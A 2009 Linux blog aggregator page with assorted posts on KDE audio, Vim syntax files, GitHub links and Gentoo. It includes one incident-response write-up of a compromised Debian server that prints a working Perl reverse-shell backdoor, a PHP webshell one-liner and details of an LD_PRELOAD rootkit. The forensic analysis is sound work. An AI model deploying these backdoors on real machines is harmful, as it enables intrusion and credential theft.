Posts for Monday, August 24, 2009

Kmix Gets Support for OSSv4

Up until now, KDE 4 users have had to use OSSv4's own sound mixer (ossxmix) to change volume levels from within KDE. Recently, though, preliminary support for OSSv4 has been built into kmix.


The Open Sound System (OSS) is a sound system for *nix operating systems built on the original OSS design. A number of users have been requesting OSSv4 support in kmix for the last year, and it has now been added to kmix's SVN trunk. I compiled kmix and tested it.

And it works pretty well.

I've built a PKGBUILD for Arch Linux. If you'd like to compile it, take a look at that for instructions.

What doesn’t work

  • Multimedia keys can't change the volume, and if you push them enough, kmix magically disappears.
  • No support for adjusting per-program volume levels.

Thanks to the KDE developer(s) for helping get OSS back into KDE 4.


My OpenDesktop Competition Submission: Wipup

Folks from PlanetKDE last heard me announcing my journey along the path to becoming a KDE developer. There are many ways to do this; unfortunately, the path that involves learning a load of C++ and starting to develop applications is making slow but steady progress and is not (yet) eligible for a public announcement.

But – there are many ways to contribute!

I have known about the OpenDesktop Competition for quite a while now, and coming from the area of web development, I realised that my latest project ties in almost perfectly with its goals. Since it is very much related to KDE development and open source in general, I wanted to share it here:

Click here to check out my submission.

Obviously the main way to make this project successful is through community support. I really think it could be integrated well, for example through plasmoids or plugins for applications such as Krita or Dolphin.

Sorry for not really explaining what it's about; it's quite difficult to explain quickly. But here is a crappy attempt: it allows users and developers to showcase their projects' works in progress and keep in touch through them.


Of course, if you like the idea, I would love feedback and voting :)

Related posts:

  1. Hello Planet KDE!
  2. How do you use your desktop?
  3. The Road to KDE Devland (Moult Edition) #0

Posts for Saturday, August 22, 2009

Falcon Indent File

I will for the moment admit defeat. I guess it's defeat. I didn't honestly try that hard, then I got bored, so I quit. Call that what you want. I call it quitting. Anyway, I took the Falcon indent file from their SVN and uploaded it. Don't worry, I made it clear I did not write the file. I'm not out to steal others' work, but at the same time I see nothing wrong with spreading free software around to the right channels. The guy who wrote it (whose name is still at the top of the file) is more than welcome to continue updating it. Either way, a syntax highlighting file and an indent file are now both available for your downloading pleasure.

Enjoy the Penguins!

Posts for Friday, August 21, 2009

TGJE no. 4 — Seeding is fun! :D

I recently got my old laptop back, and being back on my own box with my trusty media player, I can write about free music again.

Truth is, what is holding me back now is the three exams I have very soon and other obligations (e.g. to ELSA), so I do not have much time to listen to music, let alone comment on it this month.

What I can and will do today though, is to comment on my changed usage of Jamendo and free music in general. In my last TGJE report I complained about the lack of Ogg Vorbis seeds on Jamendo. Well, I decided (as I usually do) to help out the best an end user can — by seeding.

I started seeding every Jamendo album that I have on my disk.

This means I had to change my behaviour pattern when it comes to music quite a bit, but I think it's worth it if it means more people can download high-quality free music via P2P!

What I did until now:

  1. I downloaded the album via KTorrent (my favourite BitTorrent client) and, when the share ratio hit 1.0, moved the album to my /music/ folder, after which I could not seed it any more;
  2. renamed the album folder to have a clean Artist — Album name;
  3. ran normalize on the album to normalise the volume levels between tracks

What I do now:

  1. I still download the album via KTorrent, but when the download finishes I use the "move data" option to move the album to my /music/ folder without having to stop seeding. The downside is that the album folders are less cleanly named, but it's a small price to pay.
  2. In Amarok 2 I do not need to run the normalisation tool, because it has built-in replay gain, which is superior to normalising tracks because a) it is automatic in the player, b) it does not re-encode the file and therefore does not lose quality, and c) it has more options.
  3. If/when I have to delete an album because I need more disk space (not uncommon now that I lost my external HDD), I can safely delete it and know all my tags will still be there when I download it again, thanks to Amarok's new AFT.

So, with new technology in KDE it is actually less work to get a better result when listening and sharing free music. Kudos!

Of course there is always place for improvement, so here is my list of possible improvements:

  • For quite a long while I have been using categories in KTorrent to tell which albums I've already moved to my music folder/partition. After thinking about it a bit, I figured it would be awesome if KTorrent could automatically assign categories to torrents that come from, e.g., the Jamendo tracker, and when the torrents in that category finish downloading, automatically move their data to a specific folder (and keep on seeding). [KDE brainstorm idea #76363]
  • There is currently a bug in Amarok that produces a corrupt torrent file when you try to download an album via Amarok. Solving it would greatly improve its usability.
  • Slightly off topic, but while Amarok does have a native implementation of the Jamendo API, there is still a lot of room for improvement: Jamendo has many options that Amarok has not implemented (yet). [KDE brainstorm idea #50950]

So, there you have it — listening to free music and sharing it with others has never been as simple as now. I hope at least some of you follow suit and seed the free music you like as much as possible!

hook out >> making recycled tea and studying again ...boy, is it hot today!

m4a audio conversion in Linux

Today, an audio file was sent to me in an email. The audio was compressed with the AAC codec and wrapped in an m4a container. In order to use it, I had to convert this file to WAV format. Usually I receive files as mp3, ogg, or flac, and use lame, oggdec, or flac to decode them back to wav. With m4a, I didn't quite know how to proceed.

In cases like this, I usually turn to sox, which has been able to handle just about everything I throw at it.  This time, it threw an error, telling me "sox formats: no handler for detected file type `audio/mp4'".  Although I knew this probably meant something like, "Hey, I know this file type, but I'm not compiled correctly to handle it!  Help!", I didn't find an easy answer...  So I started looking elsewhere.

I happened upon a wonderful audacious plugin called "FileWriter", which comes by default in Gentoo installations of audacious.

I right-clicked on the main window and went to Preferences -> Audio -> Current output plugin -> FileWriter Plugin.

Then I loaded the m4a file into audacious and played it. About 3 seconds later, I had a nice new wav file created from the m4a file through audacious.

So, I thought I'd just let y'all know how to convert from m4a to just about anything you need.
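For what it's worth, this can also be done from the command line. The helper below is my own sketch, not something from the post, and it assumes ffmpeg is installed:

```shell
# Hypothetical helper: convert an .m4a to a .wav next to the input file.
# ffmpeg is an assumption here; faad or mplayer were the era's alternatives.
to_wav() {
    ffmpeg -loglevel error -i "$1" "${1%.m4a}.wav"
}
# usage: to_wav voicemail.m4a   # writes voicemail.wav
```

The `${1%.m4a}` expansion just strips the extension so the output lands beside the input.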

There’s a rootkit in the closet!

Part 1: Finding the rootkit

It's Monday morning and I am out for coffee in downtown Thessaloniki when a partner calls:
- On machine XXX mysqld is not starting since Saturday.
- Can I drink my coffee and come over later to check it? Is it critical?
- Nope, come over anytime you can…

Around 14:00 I go over to his company to check on the box. It's a Debian oldstable (etch) that runs apache2 with the Xoops CMS + Zen Cart (version unknown), postfix, courier-imap(s)/pop3(s), bind9 and mysqld. You can call it a LAMP machine with a neglected CMS which is also running as a mail server…

I log in as root, do a ps ax, and the first thing I notice is apache having more than 50 threads running. I shut apache2 down via /etc/init.d/apache2 stop. Then I start poking at mysqld. I can't see it running in ps, so I try starting it via the init.d script. Nothing… it hangs while trying to start. I suspect a failing disk, so I use tune2fs -C 50 /dev/hda1 to force an e2fsck on boot, and I reboot the machine. The box starts booting, checks the fs, finds no errors, continues, and hangs at starting mysqld. I break out of the process and am back at the login screen. I check the S.M.A.R.T. status of the disk via smartctl -a /dev/hda: all clear, no errors found. Then I try to start mysqld manually; it looks like it starts, but when I try to connect to it via a mysql client I get no response. I try to move the /var/lib/mysql/ files to another location and re-init the mysql database. Trying to start mysqld after all that, still nothing.

Then I try to downgrade mysql to the previous version. The apt-get process tries to stop mysqld before replacing it with the older version and hangs; I try to break out of the process but it's impossible… after a few rounds of killall -9 mysqld_safe; killall -9 mysql; killall -9 mysqladmin it finally moves on, but when it tries to start the downgraded mysqld version it hangs once again. That's totally weird…

I run ldd /usr/sbin/mysqld and notice a very strange library under /lib/ in the output. I had never heard of that library name before, so I google it. Nothing comes up. I check the output of ldd /usr/sbin/mysqld on another debian etch box I have, and no such library comes up. I am definitely looking at something that shouldn't be there. And that's a rootkit!

I ask some friends online, but nobody has ever faced that library rootkit before. I try to find the file on the box, but it's nowhere to be seen inside /lib/… the rootkit hides itself pretty well. I can't see it with ls /lib or echo /lib/*. The rootkit has probably patched the kernel functions that would allow me to see it. Strangely, though, I was able to see it with ldd (more about the technical stuff in the second half of the post). I check some other executables with a for i in /usr/sbin/*; do ldd $i; done; all of them appear to have the same library as a dependency. I try to reboot the box with a kernel other than the one it's currently using, but I get strange errors that it can't even find the hard disk.

I try to downgrade the "working" kernel in an attempt to boot the box cleanly, without the rootkit. I first take backups of the kernel and initramfs which are about to be replaced, of course. When the apt-get procedure calls mkinitramfs to create the initramfs image, I notice errors saying it can't delete the /tmp/mkinitramfs_UVWXYZ/lib/ file, so rm fails and that makes mkinitramfs fail as well.

I decide that I am doing more harm than good to the machine and that I should get an image of the disk before fiddling with it any more. So I shut the box down and set up a new box with most of the services that should be running (mail + DNS), so I could examine the rootkitted disk on my own time.

Part 2: Technical analysis
I. First look at the library

A couple of days later I attached the disk to my box and made an image of each partition using dd:
dd if=/dev/sdb1 of=/mnt/image/part1 bs=64k

Then I could mount the image using loop to play with it:
mount -o loop /mnt/image/part1 /mnt/part1

A simple ls of /mnt/part1/lib/ revealed that the library was there. I ran strings on it:
# strings /lib/
Welcome master

As one can easily see, there's some sort of password hash inside, plus references to /usr/sbin/sshd and /bin/sh, and code setting HISTFILE to /dev/null.

I took the disk image to my friend argp to help me figure out what exactly the rootkit does and how it was planted to the box.

II. What the rootkit does

Initially, while casually discussing the incident, kargig and myself (argp) thought we were dealing with a kernel rootkit. However, after carefully studying the disassembled dead listing of the library, it became clear that it was a shared-library-based rootkit. Specifically, the intruder created the /etc/ file on the system with just one entry: the path where he saved the shared library under /lib/. This has the effect of preloading the library every single time a dynamically linked executable is run by a user. Using the well-known technique of dlsym(RTLD_NEXT, symbol), in which the run-time address of the symbol after the current library is returned to allow the creation of wrappers, the shared library trojans (or hijacks) several functions. Below is a list of some of the functions the shared library hijacks and brief explanations of what some of them do:

  • The hijacked accept() function sends a reverse (i.e. outgoing) shell to the IP address that initiated the incoming connection at port 80, but only if the incoming IP address is a specific one. Afterwards it calls the original accept() system call.
  • The hijacked getspnam() function sets the encrypted password entry of the shadow password structure (struct spwd->sp_pwdp) to a predefined hardcoded value ("$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0").
  • The hijacked read() and write() functions wrap the corresponding system calls and, if the current process is ssh (client or daemon), append their buffers to the file /var/opt/_so_cache/lc for outgoing ssh connections, or to /var/opt/_so_cache/ld for incoming ones (sshd). These files are also kept hidden using the same approach as described above.

III. How the rootkit was planted in the box

While argp was looking at the objdump output, I decided to take a look at the server's logs. The first place I looked was the apache2 logs. Opening /mnt/part1/var/log/apache2/access.log.* didn't reveal anything at first sight, nothing really stood out, but when I opened /mnt/part1/var/log/apache2/error.log.1 I found these entries at the bottom:

=> `foobar.ext'
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 695 [text/plain]
foobar.ext: Permission denied

Cannot write to `foobar.ext' (Permission denied).
=> `foobar.ext'
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 695 [text/plain]

0K 100% 18.61 MB/s

01:05:51 (18.61 MB/s) - `foobar.ext' saved [695/695]

=> `foobar.ext'
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 695 [text/plain]
foobar.ext: Permission denied

Cannot write to `foobar.ext' (Permission denied).
=> `foobar.ext'
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 695 [text/plain]

0K 100% 25.30 MB/s

01:17:26 (25.30 MB/s) - `foobar.ext' saved [695/695]

So this was the entry point: someone got into the box through a web app and was able to run code.
I downloaded "foobar.ext" from the same URL; it was a perl script.

# Data Cha0s Perl Connect Back Backdoor Unpublished/Unreleased Source
# Code

use Socket;

print "[*] Dumping Arguments\n";

$host = "A.B.C.D";
$port = XYZ;

if ($ARGV[1]) {
    $port = $ARGV[1];
}

print "[*] Connecting...\n";

$proto = getprotobyname('tcp') || die("[-] Unknown Protocol\n");

socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die("[-] Socket Error\n");

my $target = inet_aton($host);

if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
    die("[-] Unable to Connect\n");
}

print "[*] Spawning Shell\n";

if (!fork()) {
    exec {'/bin/sh'} '-bash' . "\0" x 4;
}

Since I knew the time when foobar.ext was downloaded, I looked at the apache2 access.log again to see what was going on at that time.
Here are some entries:

A.B.C.D - - [15/Aug/2009:01:05:33 +0300] "GET HTTP/1.1" 302 - "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:34 +0300] "POST HTTP/1.1" 200 303 "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:34 +0300] "GET HTTP/1.1" 200 131 "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:38 +0300] "GET HTTP/1.1" 200 - "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:47 +0300] "GET HTTP/1.1" 200 52 "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:50 +0300] "GET HTTP/1.1" 200 - "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:51 +0300] "GET HTTP/1.1" 200 59 "-" "Mozilla Firefox"

The second entry, with the POST, looks pretty strange. I opened the admin/record_company.php file and discovered that it is part of Zen Cart. The first result of googling for "zencart record_company" is this: Zen Cart 'record_company.php' Remote Code Execution Vulnerability. So that's exactly how they were able to run code as the apache2 user.

Opening images/imagedisplay.php shows the following code:
<?php system($_SERVER["HTTP_SHELL"]); ?>
This code allows running commands under the account of the user running the apache2 server (the command arrives in a "Shell:" request header, which PHP exposes as $_SERVER["HTTP_SHELL"]).

Part 3: Conclusion and food for thought
To conclude on what happened:
1) The attacker used the zencart vulnerability to create the imagedisplay.php file.
2) Using the imagedisplay.php file he was able to make the server download foobar.ext from his server.
3) Using the imagedisplay.php file he was able to make the server run foobar.ext, which is a reverse shell. He could now connect to the machine.
4) Using some local exploit(s) he was probably able to become root.
5) Since he was root, he uploaded/compiled the library and created /etc/ Now every executable would first load this "trojaned" library, which gives him backdoor access to the box and hides itself from the system. So there is his rootkit :)

Fortunately, the rootkit had problems: if the /var/opt/_so_cache/ directory was not manually created, it couldn't write the lc and ld files inside it. Only once you created the _so_cache dir did it start logging.

If there are any more discoveries about the rootkit, they will be published in a new post. If someone else wants to analyze the rootkit, I would be more than happy if he/she posted a link to the analysis as a comment on this blog.

Part 4: Files

In the following tar.gz you will find the library and the perl script foobar.ext (use at your own risk; the attacker's host/IP have been removed from the perl script): linuxv-rootkit.tar.gz

Many many thanks to argp of Census Labs

A Better Link

I started on this thinking it would be an easy task. See, I can never remember the argument order for a link (ln -s file/folder location-to), so I decided to build a script that would print usage and display the link once it's been made. This turned out to be a pretty good exercise: 'ln' needs a path when linking a file in the current directory, a full path isn't readily available, and names with spaces need handling.
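For reference, the argument order in question, target first and link name second:

```shell
# ln -s TARGET LINK_NAME: the existing file comes first, the new link second.
demo=$(mktemp -d)
echo hi > "$demo/target.txt"
ln -s "$demo/target.txt" "$demo/link.txt"
cat "$demo/link.txt"    # prints: hi
```

The 'lnk' script below wraps exactly this call, adding the usage message and collision checks.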

Anyways, enough of the chatter. Here's 'lnk'. It will display usage if no arguments are given, display the link when done, and check whether the name already exists.

You'll likely need to install 'realpath', as it isn't installed by default on most distributions.

#!/bin/bash
# lnk - link files/folders without broken links and feedback
# Author: Gen2ly

# Text color variables
TXTBLD=$(tput bold)     # Bold
TXTUND=$(tput sgr 0 1)  # Underline
TXTRED=$(tput setaf 1)  # Red
TXTGRN=$(tput setaf 2)  # Green
TXTYLW=$(tput setaf 3)  # Yellow
TXTBLU=$(tput setaf 4)  # Blue
TXTPUR=$(tput setaf 5)  # Purple
TXTCYN=$(tput setaf 6)  # Cyan
TXTWHT=$(tput setaf 7)  # White
TXTRST=$(tput sgr0)     # Reset

# Display usage if both arguments aren't given.
if [[ -z "$2" ]]; then
  echo " lnk <file-or-folder> <link-to-location>"
  exit
fi

# Check if file or folder exists
if [[ ! -f $1 ]] && [[ ! -d $1 ]]; then
  echo " File/folder does not exist"
  exit
fi

# Variables to check if link points to a folder or to a new link
LINKDIR=${2%/}/${1##*/}
LINKNEW=$2

# Check if the link name matches another link
if [[ -L $LINKDIR ]] || [[ -L $LINKNEW ]]; then
  echo " Link already exists:"
  if [[ -L $LINKDIR ]]; then
    echo " $(ls -la --color=always $LINKDIR | awk '{printf $8" "$9" "$10}')"
  fi
  if [[ -L $LINKNEW ]]; then
    echo " $(ls -la --color=always $LINKNEW | awk '{printf $8" "$9" "$10}')"
  fi
  exit
fi

# Check if link name matches a file name
if [[ -f $LINKDIR ]] || [[ -f $LINKNEW ]]; then
  echo " File already exists with that name:"
  if [[ -f $LINKDIR ]]; then
    echo " $(ls -la --color=always $LINKDIR | awk '{printf $1" "$8}')"
  fi
  if [[ -f $LINKNEW ]]; then
    echo " $(ls -la --color=always $LINKNEW | awk '{printf $1" "$8}')"
  fi
  exit
fi

# Create symbolic link
# 'ln' needs a path argument for linking a file in the current directory
# realpath escapes '\'s before spaces
FPATH=`realpath "$1" | sed -e 's: :\\ :g'`
ln -s "$FPATH" $2

# Display colors for full file path, link same path, link new path
FPATHDIS=${TXTBLD}${TXTGRN}$FPATH${TXTRST}
LINKDIRDIS="${TXTBLD}${TXTCYN}$(realpath -s "$LINKDIR")${TXTRST}"
LINKNEWDIS="${TXTBLD}${TXTCYN}$(realpath -s $LINKNEW)${TXTRST}"

# Display linked file
if [[ -L $LINKDIR ]]; then
  echo " $FPATHDIS -> $LINKDIRDIS"
fi
if [[ -L $LINKNEW ]]; then
  echo " $FPATHDIS -> $LINKNEWDIS"
fi

# Limitations
# Because lnk must check if the link points to a folder or a new link name,
# if creating a link of a file that has the same name as a directory
# and the link has the same name as a link in that directory, lnk will
# fail from a link check.

You’re putting your mum on Gentoo? You’re mad.

This is the second time I'm putting Gentoo on my mum's computer. The first time was a good year or so ago; however, my own old laptop suffered a hardware failure soon after, and so I *ahem* took her computer. (I'm innocent, I swear!) She's decently computer-illiterate and has always wanted to learn. She recently got a new laptop, an Acer Aspire 4535 (it comes without Windows pre-installed).

I had to install it using SystemRescueCD, as Gentoo's minimal install didn't have the module for my NIC. Xorg is compiling, the holidays are almost over, and it's time to overload my schedule again.

To make this a bit more computer-relevant, I ask you: what do you suggest I do to make it "easier" to use for someone like my mum? I am planning a cron-scheduled routine sync, update, and revdep-rebuild. I don't think I can automate etc-update, but that could be pretty easy to train her on, I think. Kernel updates are going to be a hassle. She wants KDE, and that means unstable packages.
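A sketch of what that scheduled job could look like as a crontab fragment; the schedule and exact commands are my assumptions, not something from the post:

```
# hypothetical /etc/crontab entry: weekly sync, world update, revdep-rebuild
0 4 * * 0  root  emerge --sync && emerge -uDN world && revdep-rebuild
```

etc-update and kernel bumps would still need a human at the keyboard, as noted above.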

Sounds fun.

Related posts:

  1. Gentoo installed (again).
  2. Gentoo, build it like Lego.

Posts for Thursday, August 20, 2009


How did I live this long without knowing about searchpairpos() in Vim? I hate when I write a clumsy, slow reimplementation of something that already exists as a standard function.

The only bad thing about both Vim and Emacs is that the feature list is about a mile and a half long (and that's a bad thing only in the sense of being an overwhelming amount of good things).

I have read almost the entire Vim manual at this point but there are corners that remain unexplored, and sometimes they contain treasure. One thing I love doing is answering Vim questions on Stack Overflow because most of the time I don't know the answer right off the bat, and so looking it up or figuring it out teaches me something new.

Emacs is another story... Emacs remains a mystery to me in many ways, in spite of having used it for about a year now. I very much plan to read the whole Emacs manual. I've already read parts of it but I seem to have barely made a dent. There are things I know should be simple to do or that there are already built-in options for, but I don't know how to do them.

  • How do I kill a word and also kill the whitespace immediately after it so it yanks properly later?
  • When I kill-whole-line and paste that line elsewhere, I lose a newline and screw up indenting. Sometimes it works how I expect and sometimes it doesn't.
  • There are so many things I can do in Vim but can't in Emacs... marks, multiple registers, abbreviations, sensibly configured per-filetype indentation.

etc. etc. I know there are ways to do these things once I have time to just sit down and read the darned manual. And learn elisp's syntax and semantics (which can't be harder than learning Vim script). My ~/.vimrc is currently twice as long as my ~/.emacs, which says a lot.

On a related note, I'm in the process of putting my Vim and Emacs configs on github.

Read "Little Brother"

The title of this post can be read either as a statement or a command, and initially I wanted to write a lengthy, sloppy post about how some books change your life or just mean a lot to someone etc. etc. etc. ...but I won't!!

It is a command.

Read it!

If you know me, you know that I don't make recommendations lightly and that I have a very good reason to do so now. (Yes, it was the first book in years that made my heart pound wildly, and I didn't want to part with it...)

If you don't know me or just don't care what I think or don't want to follow what I say, read it anyway! XD

I won't tell you why, just do it! Now!!!

Bloody download the bloomin' book and read it!!!

hook out >> read it, enjoyed it, have to study now

P.S. Cory Doctorow, you are an evil evil man to have written such a brilliant book. If I fail these exams, I am sooooo totally blaming your evil genius for making me procrastinate!!! XD

"What's in a name? That which we call a rose / By any other name would smell as sweet."

The quote that forms the heading of this post is from William Shakespeare's play "Romeo and Juliet"; this post is about names.

Today _why died. But _why is not a real person, he is the virtual personality of someone. That someone decided to delete _why's Twitter account, his websites and similar things for unclear reasons (and those reasons are not actually the topic here either). _why's "death" created quite a lot of fuss in the Ruby community where _why was … well not a star, more like a saint actually ;-).

If I described this to my dad he'd call those guys nuts: _why is not a "real person" and _why was not his "real name", so why talk about it? What is it with those "nicknames" anyway?

A few days ago I wrote about our authorship fetish and how some people can't deal with the fact that the "brilliant creator" doesn't exist anymore (and never really has) because we just merge all our influences and communication to "create". The fetish for the "author" is only outmatched by our fetish for names.

When we are born a name is given to us, we even call it our "given name". The rest of our name is inherited from our parents: We have no choice and we are not asked. But all our life we are forced to use that name, everywhere. When I want to publish "serious" work I have to put my "real name" on it. When I order something online, I have to give my "real name". Many have gotten used to people that "live online" having "aliases" just as we allow "artists" to have stage names. But those are not "real" in our minds. They are just "made up" and therefore are just toys.

In older times people used to use "invented" names because they thought that if someone knew your real name, that person had "power" over you and could cast magic spells on you. Today probably only very few people still believe in that direct relation, but the way we see "real names" still hasn't changed: if tomorrow I asked everybody to call me "WASD" or "1234" or "Peter" I'd be looked at like I was a madman (even more than usual). I can change my "official" name only for a lot of money, and only if I have a very serious reason and can convince some bureaucrat to agree that I should be allowed to change my name. And even then I cannot really choose freely; I have to choose something "appropriate", something that looks like a "real name".

Online I usually use the handle "tante" (if it's not already taken, which happens more often than I like ;-)) and there's a bunch of people who either only know me by that name or would never call me anything else even if they know my real name. If you want to get my attention in real life, your chances are best if you yell "tante" and not "Jürgen" or "Mr. Geuter". "tante" is my name. I picked it; it was not chosen for me. So why should it be any less "real" than the name my parents picked for me? And why shouldn't I be allowed to drop it any time I want and choose another one?

Names don't have mystical powers, they're just handles. As any government official will tell you, they're not even very good identifiers, cause we have so many name collisions. Which is why official databases use something else as identifier. So if names are no longer identifiers (a function they might have had in the past) why should we force people to stick to the name they didn't even chose for themselves? We don't force people to stick to the religion that their parents might have chosen for them by having them christened as babies. Why with names?

Yeah it might be a pain in the ass to learn a new name if someone you've known for a long while changes his/her handle, but in this case, it's not about you.

Names are like fashion. A chosen name says something about the person that chose it. Maybe it just says something about what that person likes soundwise. Maybe it says more. But we'd never say that some man isn't allowed to wear a skirt if he wants to, so why shouldn't I be allowed to change my "real name" to "f(x)=Π*6/x"?

I propose the following new rule: Everybody can always change his/her name. There's a fee to cover the actual costs (like changing passports and stuff) but that's it. If you wanna be called "Poopy the dogmaster" so be it.

Shoes 2 packaged for Ubuntu: My first package

So you may have noticed a few days ago a link to an article on teaching programming in a newish language called Shoes. It's a cute language on top of Ruby for whipping up fun little GUI apps, event-oriented and good for introductions to programming. I wanted to play with it, but Ubuntu and Debian ship the old version 1, and version 2 has been out since December 2008. So I checked Ubuntu's bugzilla, and sure enough, there was a bug from April asking for a version bump, with no response. So I figured it might be time to step up to the plate. I brought up the Ubuntu Packaging Guide and gave it a read. It turns out Shoes wasn't trivial to package, but with the old version 1 deb package as a starting point I was able to get version 2 packaged! It's now sitting in Ubuntu's bugzilla, and if you just want the Shoes 2 i386 deb, it's there too. So yeah, check it out, give it a whirl, have fun.

As a side note, I've found Ubuntu's bugzilla to be only sporadically responsive, which sucks a bit but does encourage one to step up some… But looking at Debian, where this package actually originated, it is even worse. They have no web interface for entering bugs; they only accept them via email or a command-line tool. It seems like an epic usability fail. So here's hoping that now that Shoes 2 has been packaged as a .deb we'll see it in Ubuntu sooner rather than later. Maybe I should just file a new bug for it?

(I hate to say it, but I have still found the Gentoo bugzilla to be blazingly responsive and have fond memories of it. I wish other communities could learn from it, whatever it is they are doing right.)

GitHub Linking part 2

This is a more involved explanation of Part 1:

The basics of what's going on here are pretty simple. Take our original link:

The first couple of parts are pretty simple.

GitHub’s URL:

Followed by the user:

… the repo name:

… the type (This is basically what you’re looking at. If you’re looking at the repository itself it’ll say “tree”):

… the jibberish:

If you look real close at "the gibberish", you'll notice it's simply the commit hash. The problem comes when you want to link to the latest version: you obviously don't want to link to an individual commit, because if you ever update, you'll have to update your link too! So instead we replace the commit hash with "master", which instructs GitHub to go to the latest version.

and finally the file:

I hope that helped!

Enjoy the Penguins!

How to link to GitHub

You’re probably thinking this is going to be the most retarded post ever because anyone can copy and paste out of the address bar in Firefox, but after a little experimentation I’ve discovered it’s not quite that easy.

I’ll use my own GitHub site’s URL as an example. Say you wanted to see my filetype.vim because you need to know how to make vim recognize those crazy .fal files for your Falcon code. So you go to my GitHub site and you find it, and you want to send it to your friends too, because you’re gracious and actually credit me with showing you how. So you copy and paste the following link:

Well, not only is that hideous and impossible to remember, but you’re not even sure it’ll work for them, and you like to show off like the pimp you really are. Well, if you take the above link and remove the gibberish in the middle:


and replace it with:


so that your final link looks like:

You can now easily link to any file you want from anyone’s github website.

Enjoy the Penguins!

Posts for Wednesday, August 19, 2009

Falcon Vim Syntax Update

I have been testing my vim syntax file for Falcon since I posted about it, and I have corrected a lot of issues with it. It now highlights single-line comments, and it also now recognizes the preprocessor statement at the top of the script. So if you’re programming in Falcon using vim, I suggest you download my update. There are other minor fixes too, but they’re not really worth mentioning. Finally, I posted my Falcon syntax file on Vim’s website, so you can find it in the official vim repositories, though I can’t promise I’ll update it there every time, so I recommend you check github if you want a copy.
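If you grab the file, installing it is just a matter of dropping it into your per-user vim directories. The sketch below writes a stand-in falcon.vim so the paths are concrete; in practice you'd copy the real file from github instead:

```shell
# Install a falcon syntax file for the current user.
# (The file contents here are a stand-in; use the real falcon.vim.)
mkdir -p ~/.vim/syntax ~/.vim/ftdetect
printf 'syntax keyword falconKeyword function end\n' > ~/.vim/syntax/falcon.vim
# Make vim recognize .fal files as falcon:
printf 'au BufRead,BufNewFile *.fal set filetype=falcon\n' > ~/.vim/ftdetect/falcon.vim
```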

I’m working on creating an indent file for Falcon as well. Indent files are more complicated, though, so it’s taking me longer to hash one out. In the meantime I believe they have one on the Falcon svn, though I do not have a link for it. I’ll post again once I have one worth publishing.

Enjoy the Penguins!


Fixing image distortion on websites using Firefox/Iceweasel 3.5 on Debian testing with intel xorg driver

Lately I noticed some image distortion on some websites when using my laptop with Debian squeeze. Menus in swiftfox did not appear as they should, some logos appeared out of place, and there were artifacts and other annoying things. For example, Planet Gnome looked like this:
When using iceweasel 3.0.12 everything looked fine. Then I followed a guide to install Iceweasel 3.5 from experimental on my system. Images looked distorted again. So there must have been a problem with the latest xulrunner…

After some googling I bumped into Debian bug #491871 – [965GM EXA] display corruption with xulrunner 1.9. Following post #67 on that thread I was able to repair my xorg.conf to something that fixed the image distortion. Now Planet Gnome looks like this:

Some info:

# apt-cache policy iceweasel xserver-xorg-video-intel xulrunner-1.9.1
iceweasel:
  Installed: 3.5.1-1
  Candidate: 3.5.1-1
  Version table:
 *** 3.5.1-1 0
          1 experimental/main Packages
        100 /var/lib/dpkg/status
     3.0.12-1 0
        500 squeeze/main Packages
         99 sid/main Packages
xserver-xorg-video-intel:
  Installed: 2:2.3.2-2+lenny6
  Candidate: 2:2.3.2-2+lenny6
  Version table:
     2:2.8.0-2 0
         99 sid/main Packages
 *** 2:2.3.2-2+lenny6 0
        500 squeeze/main Packages
        100 /var/lib/dpkg/status
xulrunner-1.9.1:
  Version table:
 *** 0
          1 experimental/main Packages
        100 /var/lib/dpkg/status

Posts for Tuesday, August 18, 2009

Touchscreens suck

Touchscreens are all the rage: Most modern smartphones use them, surf-tablets or other appliances integrate them. They allow the developer (and sometimes the user) to customize the interface a lot more than what they are used to: Buttons are not mapped to actual buttons on a keyboard anymore so you can change their design or size any given time allowing really pretty interfaces. We even start to integrate touchscreens that can register more than one contact (so-called "multitouch") to trigger actions with certain complex hand gestures. Touchscreens are so neat. And they suck so bad.

Let me elaborate. We as human beings come with a set of features and limitations as well as a few basic principles that are hardwired into our brains. We do for example know that when we grab something we have to close our hand around it. That idea has found its way into our language, too: "grasp" for example means to actually grab a physical object as well as to understand something (as in grabbing it with your mind); the same phenomenon can be found in German ("begreifen") and Latin ("capere"). It seems to be a correlation that comes to us quite "naturally".

Now let us apply that idea to touchscreens. When I want to move an object in the real world, I grab it, I move my hand and I let the object go. With a conventional mouse I click (which is a movement similar to closing the hand if you look at it), I hold the button (I keep the hand closed), I move my hand and then I release the button (I "open my hand"). The way the mouse works is very similar to how the real-world process works. On a touchscreen I just point at the thing I want to move. I don't grab it, I don't even have to touch it "harder" or anything, I just touch. Then I move my finger and lift it away from the screen. That is not natural at all.

Let's look at another thing: typing. At home I use a Lenovo Thinkpad. I bought it for a bunch of reasons, but one main reason was that the keyboard is awesome: the buttons have a really good feel, and I am never unsure whether a keypress registered or not. The resistance of the keys is pretty brilliant. And it makes sense, because we have learned how buttons work since we were little children: you press the thingy, you hear a "click" or feel it, and now you know that an action will happen (or if it doesn't, you know that something is broken). If your button has no such haptic response, people will be confused and constantly check whether the button really worked. Welcome to touchscreen land: pressing a button either gives you no haptic feedback (it makes no difference whether you hit the button or the area next to it) or the device starts doing something weird (like vibrating; seriously, if my buttons at home vibrated when I pushed them I'd go nuts). The reaction of the button to the activation is completely counterintuitive (especially considering that the screen usually still shows me that I "pushed the button down" when I obviously didn't). Typing on touchscreen interfaces kinda works for short texts but not for real typing, due to the lack of feedback, which irritates your brain and makes you hit the surface harder than you have to. The resistance that real keys have is also a buffer that helps the brain act properly.

Well, now we have looked at two aspects, and maybe you consider both of them invalid, rendering my whole rant moot. Good thing that I kept an ace up my sleeve, the absolute killer argument for why touchscreens suck.

